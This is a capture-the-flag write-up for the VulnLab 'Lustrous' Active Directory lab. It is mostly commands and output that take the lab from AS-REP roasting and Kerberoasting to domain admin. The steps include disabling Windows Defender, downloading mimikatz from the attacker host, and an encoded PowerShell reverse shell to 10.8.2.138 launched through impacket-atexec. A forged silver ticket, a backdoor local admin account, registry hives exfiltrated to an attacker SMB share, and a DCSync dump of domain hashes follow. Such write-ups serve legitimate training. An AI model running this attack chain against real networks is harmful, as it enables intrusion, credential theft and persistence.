vulnlab-lustrous

vulnlab lustrous

Lustrous, a medium chain AD machine involved two machines, LusMS and LusDC , from LusMS, accessing the ftp share there were usernames which out of which ben.cox didn’t require any pre-authentication, resulting in AS-REP roasting , having remote access to LusMS, local administrator password found in a form of secure string that can be converted back to plaintext, getting the system account and accessing the web application on LusDC, it required kerberos authentication in order to access the site, since there was a service account with a SPN, on performing kerberoasting , svc_web’s hash was cracked and with forging silver ticket as tony.ward who is a part of backup operator group, we can retrieve his password from the site and with impacket-reg  retrieving the SAMSYSTEM and SECURITY file and then dumping NTDS.dit file with LusDC hash to get domain admin

Writeup:

Enum anonymous ftp finds 3 users

After this we take a look for kerberoastable users

┌──(puck㉿kali)[~/vulnlab/lustrous]
└─$ impacket-GetNPUsers -usersfile users.txt lustrous.vl/Username@lusdC.lustrous.vl -no-pass -dc-ip 10.10.187.53
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
$krb5asrep$23$ben.cox@LUSTROUS.VL:6c2235fc542be350acb491b50c61c07d$a9feb90a9a6784eba15a6af651082f5e97f3805acbf9dd672bc3a74ffdf4ef8700e34fc732393af129f6779f8023711787ace5213a4d7397c06621048dcd6ced94bcc3030e>
[] User rachel.parker doesn‘t have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn’t have UF_DONT_REQUIRE_PREAUTH set
[] User wayne.taylor doesn’t have UF_DONT_REQUIRE_PREAUTH set

.

impacket-GetUserSPNs -dc-ip 10.10.187.53 -usersfile users.txt -request lustrous.vl/‘ben.cox’:‘Trinity1’

 

crack some hashes

The hash identifier for Kerberos 5, etype 23, AS-REP hashes is 18200.

The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.

You can find this within the hashcat example hashes page.

hashcat -m 18200 -o cracked.txt ben.cox.hash /usr/share/wordlists/rockyou.txt

.

Do some Bloodhound analysis, to find high valuable targets

bloodhound-python -d lustrous.vl -c all -u ben.cox -p Trinity1 -ns 10.10.187.53 –dns-tcp

.

$ impacket-GetUserSPNs Lustrous.vl/ben.cox:Trinity1 -dc-ip lusdc.lustrous.vl -request-user svc_web
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
———————- ——- ——– ————————– ————————– ———-
http/lusdc svc_web 20211222 13:46:12.670282 20211227 13:45:43.927619
http/lusdc.lustrous.vl svc_web 20211222 13:46:12.670282 20211227 13:45:43.927619
[] CCache file is not found. Skipping…
$krb5tgs$23$*svc_web$LUSTROUS.VL$Lustrous.vl/svc_web*$fec3e242194f52c140173bb7e0b2df73$e898fd0c2e9ea4fed53d9537a90e5c4daf043e597802909d35109f8891bc25e5a6aaaa6e2739e485425b244c3735913ff0f4426ce73c6021df92c557f4ab1eb6c481a657d26b801e18cc6af1cc789316f2045fc77e2cbaaf97aa6ae1fb7f26a0310bb149f06c2a65c3ba2315b3178d17669c8eb7a5c571f2bfaf5d0673dff09564526c9308ecc38663419cc55cc7f30ed1c7e8507f6b328284cfbf8911e9fcbfb57b4ccf0c5718e370450ab04b8c6e32fc9339fa3a3a9b349f9b6331d49a3bf080d8d1f94982d4aa87ec49de95d6efb283a196124c1b8cdd1a44c9b1201cf213a07dfb5ce2cda72465368796a991a4e25ed2165e9af342f39a06dd7acf1bcd8146036d64f8913c63c13c7c2ec8e15e3bcc364fc0a15bd8caef7ea023461fa8ddd6f734d2e5f5aa6ed2a544c09b05d653896e7a4c44d27ffba095be6aceec903378b6fc6ca41fc485fcaf5f041682a8c2a7510e23b827a542464e68002dee9cd17a5d09ca3f6b8a9d69fd34fcaa0eb35d36db5f47b9af13f8bac9ca2fe84eabb5858f8ba85864eed9b407c53426bbcde4742a66ac734365d4d72faa8d68e6db348b5e70c5abc6278dc474ab8d91fa45fc38447b470f3f5b480a3c27c34ffac8aff5e7cbed4dcb5ac4529cf42b0f3142d053879891bc224acece35f25164c38a9b2ab058bae92c0498051259c4cba97214aff005d8adba5a073be1cab0dc832abae307b04694c049bd52cf774829d4ae48c79abd188e373fb6108c351f12969e5badc2da61e0c0a0a063dbc637e08473d332fcccd8a3bbb45d5360bd2c11861fe94a290e357c18be4c2c0f849843f3e93ba81a34a1eca0661a7b24e7f3cb459cbd73a243d49b9357c70efcddabe13afa1d9778033681129046a8034b1dd26217dae4bde336b5871961623f2156515325888499f3a6cda70985981550d147f61f028040c9f6a6c78a8b9c406ca1b7d47ac14a25db13c48db0726f215c650723fd267dd9b832fda6700fc964c0df83369c4d21e475d69ac907d072b561aa6011a5bcca92d93ee834bee6619b3461bd9db8371cc6872b4adacadd07119dd3128073c03c110e1878f7d35e51eff75e15b774e5d0e7c775b94bf2a8c3dbac3ab7fa3f38670ed3b486f9c5a7245afa95550a43bd8dbd3d8923f18565a3899294dea285cc7f8e653a493283449cad01be0862053c1121563d7ebfb4e63e896e19d1216e31dde60e04e1b6ea383b7c6c8534c97c6ff9ebe5e0e5839cc0c267cebd21461b847c07285c6d99fe14b6d35b22b96f4242acd5d0668a1431d14a582b0a19a35bd657f29b230173fb9bf0a76ed88aff79947ebdc45ff4067c5aa96ccb37ff9633b9a77b4f241f8961334cbaec36007670f0e695a76c735a2cb4106ef6e2de129c964e8353b37db9d9cad57a0998979539ea8435ee2ed4ca05fbb7472e46a212a096f0bf75

.

The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.

You can find this within the hashcat example hashes page.

hashcat -m 13100 -o cracked_svcweb.hash.txt svcweb.hash /usr/share/wordlists/rockyou.txt

.

winrm to lusms.lustrous.vl

evil-winrm –ip lusms.lustrous.vl -u ‘ben.cox’ -p ‘Trinity1’

On Ben’s Desktop, we found an xml representation of a PSCredential Object file named admin.xml.

following this blog post, we can extract the cleartext data from the file

.

*Evil-WinRM* PS C:\Users\ben.cox\Desktop> type admin.xml
<Objs Version=“1.1.0.1” xmlns=“http://schemas.microsoft.com/powershell/2004/04”>
<Obj RefId=“0”>
<TN RefId=“0”>
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N=“UserName”>LUSMS\Administrator</S>
<SS N=“Password”>01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
</Props>
</Obj>
</Objs>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $user = “Administrator”
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = “01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367”
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = “01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367” | ConvertTo-SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred.GetNetworkCredential() | Format-List
UserName : Administrator
Password : XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
SecurePassword : System.Security.SecureString
Domain :
*Evil-WinRM* PS C:\Users\ben.cox\Desktop>

 

logon as Administrator, and make ben.cox an admin

┌──(puck㉿kali)[~/vulnlab/lustrous]
└─$ evil-winrm –ip lusms.lustrous.vl -u ‘Administrator’ -p ‘XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF’
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
VL{40<redacted>48}
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user puck Summer2024 /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators puck /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators ben.cox /add
The command completed successfully.

Look around

┌──(puck㉿kali)[~/vulnlab/lustrous]
└─$ xfreerdp /u:puck /p:‘Summer2024’ /v:lusms.lustrous.vl /cert:ignore /rfx
start edge, login to https://lusdc.lustrous.vl as ben.cox
and find the secure note.

We have also the password for the service account, so we can craft a ticket for any other user. See: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets

We go and disable windows defender and upload mimikatz, in our current powershell session , where we can store a new ticket for the administrator account

set-mppreference -disablerealtimemonitoring $true
iwr http://10.8.2.138/mimikatz.exe -outfile mimikatz.exe

then we use mkpsrevshell.py

 

python3 mkpsrevshell.py 10.8.2.138 443

.

─$ impacket-atexec ‘administrator’@10.10.207.70 “powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA”
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[!] This will work ONLY on Windows >= Vista
Password:
[*] Creating task \RqYvQaAv
[*] Running task \RqYvQaAv
[*] Deleting task \RqYvQaAv
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp

 

 

All in one

PS C:\temp> .\mimikatz.exe “kerberos::purge” “kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward” “exit”
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. “A La Vie, A L’Amour” – (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
‘## v ##’ Vincent LE TOUX ( vincent.letoux@gmail.com )
‘#####’ > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward
User : tony.ward
Domain : lustrous.vl (LUSTROUS)
SID : S-1521235509275415845019581513963426
User Id : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 – rc4_hmac_nt
Service : http
Target : lusdc.lustrous.vl
Lifetime : 9/21/2024 6:04:01 PM ; 9/19/2034 6:04:01 PM ; 9/19/2034 6:04:01 PM
> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for ‘tony.ward @ lustrous.vl’ successfully submitted for current session
mimikatz(commandline) # exit
Bye!
PS C:\temp> iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
PS C:\temp> whoami
nt authority\system
PS C:\temp> hostname
LusMS
PS C:\temp> klist
Current LogonId is 0:0x3e7
Cached Tickets: (1)
#0> Client: tony.ward @ lustrous.vl
Server: http/lusdc.lustrous.vl @ lustrous.vl
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000> forwardable renewable pre_authent
Start Time: 9/21/2024 18:04:01 (local)
End Time: 9/19/2034 18:04:01 (local)
Renew Time: 9/19/2034 18:04:01 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
PS C:\temp>
PS C:\temp> iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

 

First we need the ntlm hash for the service account (svcweb)

┌──(puck㉿kali)[~/vulnlab/lustrous]
└─$ iconv -f ASCII -t UTF-16LE <(printf “iydgTvmujl6f”) | openssl dgst -md4
MD4(stdin)= e67af8b3d78df5a02eb0d57b6cb60717

The following wmic command can be use to get  the SID of tony.ward. ( or we use bloodhound for this )

C:\Windows\system32>wmic useraccount where name=‘tony.ward’ get sid
SID S-15212355092754158450195815139634261114

The NTLM hash we then use in the rc4 parameter

kerberos::golden /domain:lustrous.vl /user:administrator /sid:S-1521235509275415845019581513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /ptt

and request our target website

iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

This gives us u

We better do not use an Administrator account for this ( meaning we need to use another target in our case tony.ward to caft a silver ticket  for tony.ward

.

kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1521235509275415845019581513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt

in Administrative cmd prompt:

C:\Windows\system32>runas.exe /noprofile /netonly /user:lustrous\ben.cox cmd.exe
Enter the password for lustrous\ben.cox: Trinity1
Attempting to start cmd.exe as user “lustrous\ben.cox”
C:\Windows\system32>

then

c:\temp>mimikatz
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. “A La Vie, A L’Amour” – (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
‘## v ##’ Vincent LE TOUX ( vincent.letoux@gmail.com )
‘#####’ > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
User : tony.ward
Domain : lustrous.vl (LUSTROUS)
SID : S-1521235509275415845019581513963426
User Id : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 – rc4_hmac_nt
Service : http
Target : LusDC.lustrous.vl
Lifetime : 7/27/2024 7:28:18 PM ; 7/25/2034 7:28:18 PM ; 7/25/2034 7:28:18 PM
> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for ‘tony.ward @ lustrous.vl’ successfully submitted for current session
mimikatz # exit
Bye!
c:\temp>

.

c:\temp>klist Current LogonId is 0:0x4900d
Cached Tickets: (1)
#0> Client: tony.ward @ lustrous.vl
Server: http/LusDC.lustrous.vl @ lustrous.vl
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000> forwardable renewable pre_authent
Start Time: 7/27/2024 19:28:18 (local)
End Time: 7/25/2034 19:28:18 (local)
Renew Time: 7/25/2034 19:28:18 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
c:\temp>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\temp> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content
<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>
<div class=“table”>
<td>
Password Reminder
</td>
<td>
U_cPVQ<redacted>0i1X
</td>
<td>
lustrous_tony.ward
</td>
<td>
<a class=“btn btn-danger” href=“/Internal
</table>
<input type=”button” value=”New Note” onclick=”window.location.href=‘/Internal/CreateNote’” />
</div>
<hr />
<footer>
<p>&copy; 2024 – SNotes</p>
</footer>
</div>
</body>
</html>
PS C:\temp>

.

PRIVESC

 

Logged in as Ben powershell right click run as user tony.ward

PS C:\Users\ben.cox> whoami
lustrous\tony.ward
PS C:\Users\ben.cox> cd c:\temp
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl –acl
[*] Identity: LocalService
\_ Access Type: Allow
\_ Registry Rights: -2147483648
\_ Inherited: False
[*] Identity: LocalService
\_ Access Type: Allow
\_ Registry Rights: ReadKey
\_ Inherited: False
[*] Identity: BUILTIN\Administrators
\_ Access Type: Allow
\_ Registry Rights: 268435456
\_ Inherited: False
[*] Identity: BUILTIN\Administrators
\_ Access Type: Allow
\_ Registry Rights: FullControl
\_ Inherited: False
[*] Identity: BUILTIN\Backup Operators
\_ Access Type: Allow
\_ Registry Rights: ReadKey
\_ Inherited: False
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl -o c:\windows\tasks\ –backup
[+] Exported \\lusdc.lustrous.vl\HKLM\SAM to c:\windows\tasks\3101BB00-F1ED-4F03-80F9-347F32D4F498
[+] Exported \\lusdc.lustrous.vl\HKLM\SYSTEM to c:\windows\tasks\B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[+] Exported \\lusdc.lustrous.vl\HKLM\SECURITY to c:\windows\tasks\2190EDEF-05BB-4DF7-B94A-729F19F83BBE
PS C:\temp>

.

┌──(puck㉿kali)[~/vulnlab/lustrous]
└─$ impacket-smbclient lustrous.vl/tony.ward:U_cP<redacted>0i1X@lusdc.lustrous.vl
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
Type help for list of commands
# use C$
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use C$
# cd windows\tasks
# ls
drw-rw-rw- 0 Sat Jul 27 13:51:14 2024 .
drw-rw-rw- 0 Sat May 27 20:32:06 2023 ..
-rw-rw-rw- 45056 Sat Jul 27 13:51:14 2024 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
-rw-rw-rw- 28672 Sat Jul 27 13:51:12 2024 3101BB00-F1ED-4F03-80F9-347F32D4F498
-rw-rw-rw- 16965632 Sat Jul 27 13:51:13 2024 B254B23F-CE5D-483A-9FAD-92192AF7CC4E
-rw-rw-rw- 6 Sat Jul 27 11:50:13 2024 SA.DAT
# mget *
[*] Downloading 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
[*] Downloading 3101BB00-F1ED-4F03-80F9-347F32D4F498
[*] Downloading B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[*] Downloading SA.DAT
#

or do it this way

┌──(puck㉿kali)[~/vulnlab/lustrous]
└─$ impacket-smbserver smb . -smb2support
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-36109833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.187.53,54551)
[*] AUTHENTICATE_MESSAGE (\,LUSDC)
[*] User LUSDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:smb)
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] LUSDC$::LUSTROUS:aaaaaaaaaaaaaaaa:a1abcb5128891908dd06050c91ebec30:0101000000000000002a54d31ee0da01c6fce3df3ca0410000000000010010006e0072006a00530065004b004f005800030010006e0072006a00530065004b004f00580002001000580070006f006200540046004900570004001000580070006f006200540046004900570007000800002a54d31ee0da0106000400020000000800300030000000000000000000000000400000e15257875fa1332fbc03b8a4fe3db518132560a8e7b113c3bb02a72a24cd55ff0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] ..snip..
[*] Disconnecting Share(1:smb)
[*] Closing down connection (10.10.187.53,54551)
[*] Remaining connections []

.

┌──(puck㉿kali)[~/vulnlab/lustrous]
└─$ impacket-reg lustrous.vl/‘tony.ward’:‘U_cP<redacted>0i1X’@10.10.187.53 -dc-ip 10.10.187.53 backup -o \\\\10.8.2.138\\smb
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe…
[*] Saved HKLM\SAM to \\10.8.2.138\smb\SAM.save
[*] Saved HKLM\SYSTEM to \\10.8.2.138\smb\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.2.138\smb\SECURITY.save

now get the machine hashes

┌──(puck㉿kali)[~/vulnlab/lustrous]
└─$ impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e<redacted>97:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn’t have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:7c8bc87fdc872e790bbf7789dba9ca54bdcd339a4858b7f0400af019b1ea70c306ca1aa097c61c16db78634d36d95d639e9e5e9486f2ac9366898ab26783e513d475edb080e42b9aa2643b83b6fcca12a57e4232154ad8aa34c32b6d7d3182d2509d8b34990dd5c23852c0149382c412bf45352f3ae8a490a454e6bd4c64a3e441f6dbeecf5f48baedbe7ddae74dd77813392a73150fa751e33f8ac0338877c7f09e54e1baef33094f8a716cd1ccc389027d80c1b834d35edd8cb926a8ba3841ca8f6afb3fa9f53c9fb11c6483ebd1f3127725c2bb160ca325869e91e2136192b454c95bdd4b662f8596518dee210daf
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:28<redacted>54
[*] DPAPI_SYSTEM
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 …~…..9….$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF……..r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z…&.m…….
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 …?..^……$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up…

get the users hashes

┌──(puck㉿kali)[~/vulnlab/lustrous]
└─$ impacket-secretsdump lustrous.vl/‘LUSDC$’@lusdc.lustrous.vl -hashes aad3b435b51404eeaad3b435b51404ee:28<redacted>54 -just-dc-user Administrator
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8<redacted>76:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:192dc734a2de3bc95bad85d2f4e3380a89ed9edb2341b124745d5dbf7ccdf6bd
Administrator:aes128-cts-hmac-sha1-96:854da5162b192ac9e6d3e15e52d326ff
Administrator:des-cbc-md5:c110a4f7f80d5d86
[*] Cleaning up…

evil win-rm to the dc

┌──(puck㉿kali)[~/vulnlab/lustrous]
└─$ evil-winrm –ip lusdc.lustrous.vl -u ‘Administrator’ -H ‘b8<redacted>76’
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
LusDC
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{53<redacted>0b}

 

.

That was Fun !